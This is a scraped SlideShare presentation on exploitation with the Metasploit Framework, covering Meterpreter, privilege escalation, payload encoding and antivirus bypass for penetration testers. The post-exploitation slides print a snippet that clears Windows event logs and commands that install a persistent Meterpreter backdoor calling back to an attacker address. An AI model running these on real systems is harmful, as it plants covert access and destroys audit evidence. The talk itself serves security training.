SlideShare a Scribd company logo
   
     www.nethemba.com            www.nethemba.com      
Exploitation with
Metasploit
Nethemba s.r.o.
Norbert Szetei, CEH
norbert.szetei@nethemba.com
   
     www.nethemba.com       
Prologue
 Metasploit Project
 Metasploit Framework – open­source platform 
for exploit developing, testing and using exploit 
code
 Metasploit Express, Metasploit Pro, NeXpose
   
     www.nethemba.com       
What else?
 Passive or active exploits
 Linux / Mac OS X / Windows / IRIX / HPUX / 
Solaris
 IPS/IDS testing
 Different communication channels
   
     www.nethemba.com       
History of Metasploit
 1.0 (2003­2004) PERL, 15 exploits, project 
started by HD Moore
 2.7 (2003­2006) PERL, more than 150 exploits
 3.+ (2007­today) Ruby, 628 exploits
 Currently 18 active developers
 Code contribution from hundreds of people
   
     www.nethemba.com       
Fundamental Parts
 Interfaces (Console, CLI, ...)
 Libraries (Rex, MSF Core, MSF Base)
 Plugins (db support, wmap, xmlrpc, ...)
 Tools (mostly external usage)
 Modules (Exploits, Auxiliaries, Payloads, 
Encoders, Nops)
   
     www.nethemba.com       
Metasploit testing environment
 Virtual machines laboratory
 Metasploitable
 Remove your Windows updates
 Hacking the web browsers
 Become a hac.. penetration tester
   
     www.nethemba.com       
Simple Usage
 exploits (check), auxiliaries
 payloads (singles, stagers, stages)
 portscan, db_autopwn
 generating payloads
 meterpreter, vncinject (full control over user)
 msfencode, msfpayload
   
     www.nethemba.com       
Meterpreter
 Injection into DLL
 Reverse connections
 Core commands
 Stdapi commands
 Priv commands
   
     www.nethemba.com       
Meterpreter ­ STDAPI
 File System commands
 Networking commands
 System commands
 User interface commands
 Keylogging
   
     www.nethemba.com       
Meterpreter ­ Priv
 System Elevation:
Named Pipe Impersonation
Token Duplication
KiTrap0D
 hashdump
 timestomp (MACE)
   
     www.nethemba.com       
Meterpreter ­ Priv
 System Elevation:
Named Pipe Impersonation
Token Duplication
KiTrap0D
 hashdump
 timestomp (MACE)
   
     www.nethemba.com       
Can a firewall protect us?
● Attacks on layer 7
● Botnets
● Social Engineering + Phishing (SET)
● PassiveX
● IDS Detection ­> SSL Encryption
   
     www.nethemba.com       
Passive X
● Modifies registry on Windows to permit loading 
untrusted ActiveX
● Loads stage ActiveX control from MSF web 
server
● Loads stagers (Meterpreter, VNC) via HTTP 
tunnel
● Unfortunately it works in IE6 only
   
     www.nethemba.com       
Reflective DLL Injection
 Loading of a library from memory into a host 
process
 Library is responsible for loading itself by 
implementing a minimal Portable Executable 
(PE) file loader
 Minimal interaction with the host system and 
process
 Difficult detection of the DLL
   
     www.nethemba.com       
Integration with third party apps
● Nessus
● NeXpose
● (Ratproxy) WMAP Web Scanner
● (Aircrack) Karmetasploit
   
     www.nethemba.com       
Exploit development
● pattern_create.rb, pattern_offset.rb
● porting exploits
● SEH exploitation, msfpescan
● msfelfscan, msfmachscan
● irb, framework for exploits development
   
     www.nethemba.com       
Exploitation on the Client Side
● Binary Payloads
● Trojan Infection
● PDF
● Java Applet
● VBScript
● Antivirus bypass
   
     www.nethemba.com       
msfencode
● msfpayload for raw payload generation
● Msfencode ­x 
Specify an alternate win32 executable template
● Injection into an existing executable, the same 
functionality
   
     www.nethemba.com       
Post Exploitation
● PSExec (windows/smb/psexec)
● Covering your tracks (event logs)
log = client.sys.eventlog.open('system') 
log.clear
● Sniffing (meterpreter, auxiliaries)
   
     www.nethemba.com       
Maintaining access
● Persistent Meterpreter Service
run persistence ­X ­i 15 ­p 3443 ­r 192.168.64.3
● Meterpreter Backdoor Service
metsvc ­h
   
     www.nethemba.com       
Epilogue
If you think technology can solve your security 
problems, then you don't understand the 
problems and you don't understand the 
technology.  (Bruce Schneier)
   
     www.nethemba.com       
References
● http://www.metasploit.com
● http://www.offensive­security.com/
● svn co 
https://www.metasploit.com/svn/framework3/trunk/
   
     www.nethemba.com       
Any questions?
Thank you for listening
Norbert Szetei, CEH

More Related Content

PDF
Art of Web Backdoor - Pichaya Morimoto
PDF
End to end web security
PPTX
Secure Programming In Php
PPT
На страже ваших денег и данных
Art of Web Backdoor - Pichaya Morimoto
End to end web security
Secure Programming In Php
На страже ваших денег и данных

What's hot (14)

PDF
Внедрение безопасности в веб-приложениях в среде выполнения
PPT
Php My Sql Security 2007
PDF
Think Like a Hacker - Database Attack Vectors
PPTX
Random numbers
PDF
Waf.js: How to Protect Web Applications using JavaScript
PDF
Protecting Java EE Web Apps with Secure HTTP Headers
PPTX
Introduction to 2FA on AWS
PPTX
Why vulners? Short story about reinventing a wheel
PPT
Sembang2 Keselamatan It 2004
PDF
Java EE 6 Security in practice with GlassFish
PDF
The Most Used Methods To Penetrate A Web Server
PDF
4.1. Path traversal post_exploitation
PPT
Hacking The World With Flash
PPTX
Introduction to path traversal attack
Внедрение безопасности в веб-приложениях в среде выполнения
Php My Sql Security 2007
Think Like a Hacker - Database Attack Vectors
Random numbers
Waf.js: How to Protect Web Applications using JavaScript
Protecting Java EE Web Apps with Secure HTTP Headers
Introduction to 2FA on AWS
Why vulners? Short story about reinventing a wheel
Sembang2 Keselamatan It 2004
Java EE 6 Security in practice with GlassFish
The Most Used Methods To Penetrate A Web Server
4.1. Path traversal post_exploitation
Hacking The World With Flash
Introduction to path traversal attack
Ad

Similar to Nethemba metasploit (20)

PDF
Smalltalk and Business
PDF
Introduction to Metasploit
PDF
Introduction to Google's Go programming language
PDF
IPMI is dead, Long live Redfish
PPTX
World of Node.JS
PPT
Open Source Presentation
PDF
Plan 9: Not (Only) A Better UNIX
PDF
BUD17-104: Scripting Languages in IoT: Challenges and Approaches
PPT
introduction to Lamp Stack
PPTX
Sinfonier: How I turned my grandmother into a data analyst - Fran J. Gomez - ...
PDF
Students of Navgujarat College of Computer Applications, Ahmedabad felt excit...
PDF
01 Metasploit kung fu introduction
PPT
Open Solaris 2008.05
PDF
Introduction to libre « fulltext » technology
PDF
Published version without demos of 200613 steve's talk on vm depot and azure ...
PDF
Haxe Toolkit and Game Development
ODP
Foss Presentation
ODP
An Introduction to Linux
PDF
오픈소스로 시작하는 인공지능 실습
PDF
CV - Resume
Smalltalk and Business
Introduction to Metasploit
Introduction to Google's Go programming language
IPMI is dead, Long live Redfish
World of Node.JS
Open Source Presentation
Plan 9: Not (Only) A Better UNIX
BUD17-104: Scripting Languages in IoT: Challenges and Approaches
introduction to Lamp Stack
Sinfonier: How I turned my grandmother into a data analyst - Fran J. Gomez - ...
Students of Navgujarat College of Computer Applications, Ahmedabad felt excit...
01 Metasploit kung fu introduction
Open Solaris 2008.05
Introduction to libre « fulltext » technology
Published version without demos of 200613 steve's talk on vm depot and azure ...
Haxe Toolkit and Game Development
Foss Presentation
An Introduction to Linux
오픈소스로 시작하는 인공지능 실습
CV - Resume
Ad

More from OWASP (Open Web Application Security Project) (12)

Recently uploaded (20)

PDF
4 Mindset Shifts to Turn Frustration into Focus
PDF
Modern Furniture Trends & Home Interior Decoration
PDF
Pranotsava Monsoon Retreat - Fazlani Nature's Nest
PPTX
Respiratory-and-Circulatory-Hazards-lecture.pptx
PDF
PrayerPetals- Where Faith and Womanhood Flourish Together.pdf
PPTX
Role, role conflict and ascribed and achieved role.pptx
DOCX
Free Pomodoro Tecnique Effect Guide -25mint - pomodorotimer.com.au
PDF
Echoes of Tomorrow - A Sustainable Legacy for Future Generations.pdf
PPTX
Expert Custom Tailoring Services for All Needs.pptx
PDF
The Lifestyle Benefits and Challenges of Living Alone
PDF
Economic and Financial Abuse - Hidden Tools of Power in Domestic Violence
PDF
The Top Life Coach in Haarlem is Life Coach Rudolfo.pdf
PDF
Home science Resource management project
PPTX
Term review 2023 Hirata TYPHOON.pptx review
PDF
Renovating a Midwest Ranch Rustic Modern Charm with Carved Doors
PPTX
PPT ARIEZ'S TOUR FINAL Pulogebang on.pptx
PPTX
hhhsyysvwvsydxuguduehshsvdhvdjbuwbjwjdbwubs
PDF
The Science-Backed Benefits of Fruit and Vegetable Extracts.pdf
DOC
学历学位硕士ACAP毕业证,澳大利亚凯斯林大学毕业证留学未毕业
PPTX
Benefits of Red Cyan Glasses - rdoptical.com.pptx
4 Mindset Shifts to Turn Frustration into Focus
Modern Furniture Trends & Home Interior Decoration
Pranotsava Monsoon Retreat - Fazlani Nature's Nest
Respiratory-and-Circulatory-Hazards-lecture.pptx
PrayerPetals- Where Faith and Womanhood Flourish Together.pdf
Role, role conflict and ascribed and achieved role.pptx
Free Pomodoro Tecnique Effect Guide -25mint - pomodorotimer.com.au
Echoes of Tomorrow - A Sustainable Legacy for Future Generations.pdf
Expert Custom Tailoring Services for All Needs.pptx
The Lifestyle Benefits and Challenges of Living Alone
Economic and Financial Abuse - Hidden Tools of Power in Domestic Violence
The Top Life Coach in Haarlem is Life Coach Rudolfo.pdf
Home science Resource management project
Term review 2023 Hirata TYPHOON.pptx review
Renovating a Midwest Ranch Rustic Modern Charm with Carved Doors
PPT ARIEZ'S TOUR FINAL Pulogebang on.pptx
hhhsyysvwvsydxuguduehshsvdhvdjbuwbjwjdbwubs
The Science-Backed Benefits of Fruit and Vegetable Extracts.pdf
学历学位硕士ACAP毕业证,澳大利亚凯斯林大学毕业证留学未毕业
Benefits of Red Cyan Glasses - rdoptical.com.pptx

Nethemba metasploit